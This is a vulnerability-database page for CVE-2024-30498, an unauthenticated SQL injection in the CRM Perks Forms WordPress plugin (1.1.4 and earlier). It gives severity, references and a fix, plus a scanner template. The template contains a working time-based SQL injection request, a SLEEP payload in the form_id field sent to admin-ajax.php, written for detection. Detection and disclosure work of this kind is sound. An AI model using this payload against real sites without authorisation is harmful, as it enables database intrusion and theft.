/Vulnerability Library

CRM Perks Forms <= 1.1.4 - SQL Injection

CVE-2024-30498
Verified

Description

CRM Perks CRM Perks Forms (affected versions 1.1.4 and earlier) contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL commands, exploit requires user interaction.

Severity

Critical

CVSS Score

9.3

Exploit Probability

2%

Published Date

March 8, 2026

Template Author

shivam kamboj

CVE-2024-30498.yaml
id: CVE-2024-30498

info:
  name: CRM Perks Forms <= 1.1.4 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    CRM Perks CRM Perks Forms (affected versions 1.1.4 and earlier) contains a SQL injection caused by improper neutralization of special elements used in an SQL command, letting attackers execute arbitrary SQL commands, exploit requires user interaction.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
  remediation: |
    Update to the latest version of CRM Perks Forms, version 1.1.5 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/crm-perks-forms/crm-perks-forms-114-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/crm-perks-forms/vulnerability/wordpress-crm-perks-forms-plugin-1-1-4-unauthenticated-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30498
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2024-30498
    epss-score: 0.02267
    epss-percentile: 0.80895
    cwe-id: CWE-89
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,crm-perks-forms

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=post_cfx_form&form_id=1%27OR(EXP(~(SELECT*FROM(SELECT(SLEEP(8)))a)))OR%27&vx_is_ajax=1&fixed[test]=a

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "\"status\":\"ok\"")'
        condition: and
# digest: 4a0a00473045022026196ea399699ec6fc30b34ff873e6d265a02fde9e4d55be79cdd0ca8838bdcc022100f9463208b77f462a9e0bc766f51bc3d153966f6589eae2d86d3ddcef1aaf88df:922c64590222798bb761d5b6d8e72950
9.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
CVE ID:
cve-2024-30498
CWE ID:
cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/crm-perks-forms/crm-perks-forms-114-unauthenticated-sql-injectionhttps://patchstack.com/database/wordpress/plugin/crm-perks-forms/vulnerability/wordpress-crm-perks-forms-plugin-1-1-4-unauthenticated-sql-injection-vulnerabilityhttps://nvd.nist.gov/vuln/detail/CVE-2024-30498

Remediation Steps

Update to the latest version of CRM Perks Forms, version 1.1.5 or later.